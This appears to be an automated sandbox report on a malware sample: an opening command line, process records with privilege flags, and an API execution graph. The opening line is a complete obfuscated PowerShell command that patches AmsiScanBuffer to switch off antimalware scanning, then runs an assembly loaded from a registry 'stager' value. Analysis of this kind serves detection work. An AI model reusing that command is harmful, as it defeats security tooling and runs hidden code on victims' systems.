$_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$YLRtgUHBybAeSz=$WRnqVVFrVLSrh.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PEmsRMlCSlPDgPcGUWk=aYWZgkdITfai @([String])([IntPtr]);$okFleUAeyDuwZAfHWQFfNP=aYWZgkdITfai @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aBWxSgKrnUs=$WRnqVVFrVLSrh.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$WzFkwARTzpFLOf=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'bra'+[Char](114)+'yA')));$qdgplTDpiNjVfetqy=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$WxFISlG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$WxFISlG,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xiihgyajRQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,4,[ref]$xiihgyajRQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BtHEHTUmMhFSXEmPh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,0x20,[ref]$xiihgyajRQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:39
                                Start time:08:55:19
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:40
                                Start time:08:55:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\dllhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
                                Imagebase:0x7ff673080000
                                File size:21'312 bytes
                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:41
                                Start time:08:55:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\winlogon.exe
                                Wow64 process (32bit):false
                                Commandline:winlogon.exe
                                Imagebase:0x7ff6cc5a0000
                                File size:906'240 bytes
                                MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:42
                                Start time:08:55:22
                                Start date:03/10/2024
                                Path:C:\Windows\System32\lsass.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\lsass.exe
                                Imagebase:0x7ff6b5fa0000
                                File size:59'456 bytes
                                MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:43
                                Start time:08:55:23
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:44
                                Start time:08:55:23
                                Start date:03/10/2024
                                Path:C:\Windows\System32\dwm.exe
                                Wow64 process (32bit):false
                                Commandline:"dwm.exe"
                                Imagebase:0x7ff7751a0000
                                File size:94'720 bytes
                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:45
                                Start time:08:55:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:46
                                Start time:08:55:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:47
                                Start time:08:55:25
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:48
                                Start time:08:55:25
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:49
                                Start time:08:55:26
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:50
                                Start time:08:55:27
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:51
                                Start time:08:55:28
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:52
                                Start time:08:55:28
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:53
                                Start time:08:55:29
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:54
                                Start time:08:55:30
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:55
                                Start time:08:55:31
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:56
                                Start time:08:55:31
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:57
                                Start time:08:55:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:58
                                Start time:08:55:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                Imagebase:0x7ff67e6d0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:622
                                Start time:08:55:42
                                Start date:03/10/2024
                                Path:C:\Windows\System32\Conhost.exe
                                Wow64 process (32bit):
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:645
                                Start time:08:55:51
                                Start date:03/10/2024
                                Path:C:\Windows\System32\Conhost.exe
                                Wow64 process (32bit):
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:1.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9%
                                  Total number of Nodes:1393
                                  Total number of Limit Nodes:7
                                  execution_graph 7454 1b444901bc4 7461 1b444901724 GetProcessHeap HeapAlloc 7454->7461 7456 1b444901bd3 7457 1b444901bda SleepEx 7456->7457 7460 1b44490159c StrCmpIW StrCmpW 7456->7460 7512 1b4449019b0 7456->7512 7458 1b444901724 50 API calls 7457->7458 7458->7456 7460->7456 7529 1b444901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7461->7529 7463 1b44490174c 7530 1b444901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7463->7530 7465 1b444901754 7531 1b444901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7531 7467 1b44490175d 7532 1b444901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7532 7469 1b444901766 7533 1b444901264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7533 7471 1b44490176f 7534 1b444901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7534 7473 1b444901778 7535 1b444901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7535 7475 1b444901781 7536 1b444901000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7536 7477 1b44490178a RegOpenKeyExW 7478 1b4449017bc RegOpenKeyExW 7477->7478 7479 1b4449019a2 7477->7479 7480 1b4449017e5 7478->7480 7481 1b4449017fb RegOpenKeyExW 7478->7481 7479->7456 7537 1b4449012b8 RegQueryInfoKeyW 7480->7537 7482 1b444901836 RegOpenKeyExW 7481->7482 7483 1b44490181f 7481->7483 7487 1b44490185a 7482->7487 7488 1b444901871 RegOpenKeyExW 7482->7488 7546 1b44490104c RegQueryInfoKeyW 7483->7546 7490 1b4449012b8 16 API calls 7487->7490 7491 1b444901895 7488->7491 7492 1b4449018ac RegOpenKeyExW 7488->7492 7493 1b444901867 RegCloseKey 7490->7493 7494 1b4449012b8 16 API calls 7491->7494 7495 1b4449018e7 RegOpenKeyExW 7492->7495 7496 1b4449018d0 7492->7496 7493->7488 7499 1b4449018a2 RegCloseKey 7494->7499 7497 1b44490190b 7495->7497 7498 1b444901922 RegOpenKeyExW 7495->7498 7500 1b4449012b8 16 API calls 7496->7500 7502 1b44490104c 6 API calls 7497->7502 7503 1b444901946 7498->7503 7504 1b44490195d RegOpenKeyExW 7498->7504 7499->7492 7501 1b4449018dd RegCloseKey 7500->7501 7501->7495 7505 1b444901918 RegCloseKey 7502->7505 7506 1b44490104c 6 API calls 7503->7506 7507 1b444901998 RegCloseKey 7504->7507 7508 1b444901981 7504->7508 7505->7498 7509 1b444901953 RegCloseKey 7506->7509 7507->7479 7510 1b44490104c 6 API calls 7508->7510 7509->7504 7511 1b44490198e RegCloseKey 7510->7511 7511->7507 7556 1b4449014a0 7512->7556 7529->7463 7530->7465 7531->7467 7532->7469 7533->7471 7534->7473 7535->7475 7536->7477 7538 1b444901486 RegCloseKey 7537->7538 7539 1b444901323 GetProcessHeap HeapAlloc 7537->7539 7538->7481 7540 1b44490134e RegEnumValueW 7539->7540 7541 1b444901472 GetProcessHeap HeapFree 7539->7541 7542 1b4449013a1 7540->7542 7541->7538 7542->7540 7542->7541 7544 1b44490141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7542->7544 7545 1b4449013cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7542->7545 7551 1b444901530 7542->7551 7544->7542 7545->7544 7547 1b4449011b5 RegCloseKey 7546->7547 7548 1b4449010bf 7546->7548 7547->7482 7548->7547 7549 1b4449010cf RegEnumValueW 7548->7549 7550 1b44490114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7548->7550 7549->7548 7550->7548 7552 1b444901580 7551->7552 7555 1b44490154a 7551->7555 7552->7542 7553 1b444901569 StrCmpW 7553->7555 7554 1b444901561 StrCmpIW 7554->7555 7555->7552 7555->7553 7555->7554 7557 1b4449014e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7556->7557 7558 1b4449014c2 GetProcessHeap HeapFree 7556->7558 7558->7557 7558->7558 8331 1b44490ad48 8332 1b444909324 _CreateFrameInfo 9 API calls 8331->8332 8333 1b44490ad7d 8332->8333 8334 1b444909324 _CreateFrameInfo 9 API calls 8333->8334 8335 1b44490ad8b __except_validate_context_record 8334->8335 8336 1b444909324 _CreateFrameInfo 9 API calls 8335->8336 8337 1b44490adcf 8336->8337 8338 1b444909324 _CreateFrameInfo 9 API calls 8337->8338 8339 1b44490add8 8338->8339 8340 1b444909324 _CreateFrameInfo 9 API calls 8339->8340 8341 1b44490ade1 8340->8341 8354 1b44490993c 8341->8354 8344 1b444909324 _CreateFrameInfo 9 API calls 8345 1b44490ae11 __CxxCallCatchBlock 8344->8345 8346 1b444909978 __CxxCallCatchBlock 9 API calls 8345->8346 8351 1b44490aec2 8346->8351 8347 1b44490aeeb __CxxCallCatchBlock 8348 1b444909324 _CreateFrameInfo 9 API calls 8347->8348 8349 1b44490aefe 8348->8349 8350 1b444909324 _CreateFrameInfo 9 API calls 8349->8350 8352 1b44490af07 8350->8352 8351->8347 8353 1b444908ff8 __CxxCallCatchBlock 9 API calls 8351->8353 8353->8347 8355 1b444909324 _CreateFrameInfo 9 API calls 8354->8355 8356 1b44490994d 8355->8356 8357 1b444909958 8356->8357 8358 1b444909324 _CreateFrameInfo 9 API calls 8356->8358 8359 1b444909324 _CreateFrameInfo 9 API calls 8357->8359 8358->8357 8360 1b444909969 8359->8360 8360->8344 8360->8345 8779 1b444914848 8782 1b44490904c 8779->8782 8783 1b444909064 8782->8783 8784 1b444909076 8782->8784 8783->8784 8785 1b44490906c 8783->8785 8786 1b444909324 _CreateFrameInfo 9 API calls 8784->8786 8787 1b444909074 8785->8787 8789 1b444909324 _CreateFrameInfo 9 API calls 8785->8789 8788 1b44490907b 8786->8788 8788->8787 8791 1b444909324 _CreateFrameInfo 9 API calls 8788->8791 8790 1b44490909b 8789->8790 8792 1b444909324 _CreateFrameInfo 9 API calls 8790->8792 8791->8787 8793 1b4449090a8 8792->8793 8794 1b44490c2f4 14 API calls 8793->8794 8795 1b4449090b1 8794->8795 8796 1b44490c2f4 14 API calls 8795->8796 8797 1b4449090bd 8796->8797 7562 1b444905fcc 7563 1b444905fd3 7562->7563 7564 1b444906000 VirtualProtect 7563->7564 7565 1b444905f10 7563->7565 7564->7565 7566 1b444906029 GetLastError 7564->7566 7566->7565 8798 1b44490824c 8799 1b444908270 __scrt_release_startup_lock 8798->8799 8800 1b44490b581 8799->8800 8801 1b44490cb10 __std_exception_copy 13 API calls 8799->8801 8802 1b44490b5aa 8801->8802 8361 1b44491494f 8362 1b444914968 8361->8362 8363 1b44491495e 8361->8363 8365 1b44490c5ac LeaveCriticalSection 8363->8365 8629 1b4449086d0 8632 1b4449090c0 8629->8632 8631 1b4449086f9 8633 1b444909116 8632->8633 8634 1b4449090e1 8632->8634 8633->8631 8634->8633 8635 1b44490c328 __std_exception_copy 38 API calls 8634->8635 8635->8633 7567 1b4449119d0 7570 1b44490e864 7567->7570 7571 1b44490e8b6 7570->7571 7572 1b44490e871 7570->7572 7576 1b44490cacc 7572->7576 7574 1b44490e8a0 7581 1b44490e53c 7574->7581 7577 1b44490cae8 FlsGetValue 7576->7577 7578 1b44490cae4 7576->7578 7577->7578 7579 1b44490cafe 7578->7579 7604 1b44490c940 GetLastError 7578->7604 7579->7574 7675 1b44490e7ac 7581->7675 7588 1b44490e5a7 7590 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7588->7590 7589 1b44490e5b6 7701 1b44490e8e0 7589->7701 7603 1b44490e58e 7590->7603 7593 1b44490e6b2 7594 1b44490d1f4 __std_exception_copy 13 API calls 7593->7594 7595 1b44490e6b7 7594->7595 7599 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7595->7599 7596 1b44490e70d 7598 1b44490e774 7596->7598 7712 1b44490e05c 7596->7712 7597 1b44490e6cc 7597->7596 7600 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7597->7600 7602 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7598->7602 7599->7603 7600->7596 7602->7603 7603->7571 7605 1b44490c966 7604->7605 7606 1b44490c96c SetLastError 7605->7606 7622 1b44490d220 7605->7622 7608 1b44490c9e5 7606->7608 7608->7579 7610 1b44490c9a5 FlsSetValue 7613 1b44490c9c8 7610->7613 7614 1b44490c9b1 FlsSetValue 7610->7614 7611 1b44490c995 FlsSetValue 7629 1b44490d2a0 7611->7629 7635 1b44490c758 7613->7635 7616 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7614->7616 7618 1b44490c9c6 SetLastError 7616->7618 7618->7608 7627 1b44490d231 _invalid_parameter_noinfo 7622->7627 7623 1b44490d282 7643 1b44490d1f4 7623->7643 7624 1b44490d266 HeapAlloc 7625 1b44490c987 7624->7625 7624->7627 7625->7610 7625->7611 7627->7623 7627->7624 7640 1b44490b470 7627->7640 7630 1b44490d2a5 HeapFree 7629->7630 7631 1b44490c9a3 7629->7631 7630->7631 7632 1b44490d2c0 GetLastError 7630->7632 7631->7606 7633 1b44490d2cd Concurrency::details::SchedulerProxy::DeleteThis 7632->7633 7634 1b44490d1f4 __std_exception_copy 11 API calls 7633->7634 7634->7631 7661 1b44490c630 7635->7661 7646 1b44490b4c0 7640->7646 7652 1b44490cb10 7643->7652 7651 1b44490c558 EnterCriticalSection 7646->7651 7653 1b44490cb59 GetLastError 7652->7653 7654 1b44490cb2f __std_exception_copy 7652->7654 7658 1b44490cb6c 7653->7658 7655 1b44490cb54 7654->7655 7659 1b44490c940 _invalid_parameter_noinfo 11 API calls 7654->7659 7655->7625 7656 1b44490cb8a SetLastError 7656->7655 7657 1b44490cb87 7657->7656 7658->7656 7658->7657 7660 1b44490c940 _invalid_parameter_noinfo 11 API calls 7658->7660 7659->7655 7660->7657 7673 1b44490c558 EnterCriticalSection 7661->7673 7676 1b44490e7cf 7675->7676 7683 1b44490e7d9 7676->7683 7727 1b44490c558 EnterCriticalSection 7676->7727 7682 1b44490e571 7687 1b44490e22c 7682->7687 7683->7682 7684 1b44490cacc 14 API calls 7683->7684 7685 1b44490e8a0 7684->7685 7686 1b44490e53c 56 API calls 7685->7686 7686->7682 7728 1b44490dd78 7687->7728 7690 1b44490e24c GetOEMCP 7692 1b44490e273 7690->7692 7691 1b44490e25e 7691->7692 7693 1b44490e263 GetACP 7691->7693 7692->7603 7694 1b44490c5d0 7692->7694 7693->7692 7695 1b44490c61b 7694->7695 7699 1b44490c5df _invalid_parameter_noinfo 7694->7699 7697 1b44490d1f4 __std_exception_copy 13 API calls 7695->7697 7696 1b44490c602 HeapAlloc 7698 1b44490c619 7696->7698 7696->7699 7697->7698 7698->7588 7698->7589 7699->7695 7699->7696 7700 1b44490b470 _invalid_parameter_noinfo 2 API calls 7699->7700 7700->7699 7702 1b44490e22c 16 API calls 7701->7702 7703 1b44490e91b 7702->7703 7704 1b44490ea71 7703->7704 7706 1b44490e958 IsValidCodePage 7703->7706 7711 1b44490e972 7703->7711 7776 1b444908070 7704->7776 7706->7704 7708 1b44490e969 7706->7708 7709 1b44490e998 GetCPInfo 7708->7709 7708->7711 7709->7704 7709->7711 7765 1b44490e344 7711->7765 7877 1b44490c558 EnterCriticalSection 7712->7877 7729 1b44490dd97 7728->7729 7730 1b44490dd9c 7728->7730 7729->7690 7729->7691 7730->7729 7736 1b44490cab0 7730->7736 7732 1b44490ddb7 7744 1b44490ffb4 7732->7744 7737 1b44490cb10 __std_exception_copy 13 API calls 7736->7737 7739 1b44490cab9 7737->7739 7738 1b44490cabe 7738->7732 7739->7738 7740 1b44490cae8 FlsGetValue 7739->7740 7741 1b44490cae4 7739->7741 7740->7741 7742 1b44490cafe 7741->7742 7743 1b44490c940 _invalid_parameter_noinfo 13 API calls 7741->7743 7742->7732 7743->7742 7745 1b44490ffc9 7744->7745 7746 1b44490ddda 7744->7746 7745->7746 7752 1b444910a40 7745->7752 7748 1b444910020 7746->7748 7749 1b444910035 7748->7749 7750 1b444910048 7748->7750 7749->7750 7762 1b44490e8c4 7749->7762 7750->7729 7753 1b44490cab0 _invalid_parameter_noinfo 14 API calls 7752->7753 7754 1b444910a4f 7753->7754 7760 1b444910a95 7754->7760 7761 1b44490c558 EnterCriticalSection 7754->7761 7760->7746 7763 1b44490cab0 _invalid_parameter_noinfo 14 API calls 7762->7763 7764 1b44490e8cd 7763->7764 7766 1b44490e38f GetCPInfo 7765->7766 7775 1b44490e485 7765->7775 7767 1b44490e3a2 7766->7767 7766->7775 7785 1b444911474 7767->7785 7768 1b444908070 _invalid_parameter_noinfo 8 API calls 7769 1b44490e524 7768->7769 7769->7704 7775->7768 7777 1b444908079 7776->7777 7778 1b444908084 7777->7778 7779 1b444908848 IsProcessorFeaturePresent 7777->7779 7778->7593 7778->7597 7780 1b444908860 7779->7780 7872 1b44490891c RtlCaptureContext 7780->7872 7786 1b44490dd78 14 API calls 7785->7786 7787 1b4449114b6 7786->7787 7805 1b44490ec58 7787->7805 7806 1b44490ec61 MultiByteToWideChar 7805->7806 7873 1b444908936 RtlLookupFunctionEntry 7872->7873 7874 1b444908873 7873->7874 7875 1b44490894c RtlVirtualUnwind 7873->7875 7876 1b444908814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7874->7876 7875->7873 7875->7874 8366 1b44490bd34 8367 1b44490bd4d 8366->8367 8380 1b44490bd49 8366->8380 8368 1b44490e864 56 API calls 8367->8368 8369 1b44490bd52 8368->8369 8381 1b44490edc8 GetEnvironmentStringsW 8369->8381 8372 1b44490bd6b 8401 1b44490bda8 8372->8401 8373 1b44490bd5f 8374 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8373->8374 8374->8380 8377 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8378 1b44490bd92 8377->8378 8379 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8378->8379 8379->8380 8382 1b44490edf8 8381->8382 8383 1b44490bd57 8381->8383 8384 1b44490ece8 WideCharToMultiByte 8382->8384 8383->8372 8383->8373 8385 1b44490ee49 8384->8385 8386 1b44490ee53 FreeEnvironmentStringsW 8385->8386 8387 1b44490c5d0 14 API calls 8385->8387 8386->8383 8388 1b44490ee63 8387->8388 8389 1b44490ee74 8388->8389 8390 1b44490ee6b 8388->8390 8392 1b44490ece8 WideCharToMultiByte 8389->8392 8391 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8390->8391 8393 1b44490ee72 8391->8393 8394 1b44490ee97 8392->8394 8393->8386 8395 1b44490eea5 8394->8395 8396 1b44490ee9b 8394->8396 8398 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8395->8398 8397 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8396->8397 8399 1b44490eea3 FreeEnvironmentStringsW 8397->8399 8398->8399 8399->8383 8402 1b44490bdcd 8401->8402 8403 1b44490d220 _invalid_parameter_noinfo 13 API calls 8402->8403 8416 1b44490be03 8403->8416 8404 1b44490be0b 8405 1b44490d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8404->8405 8407 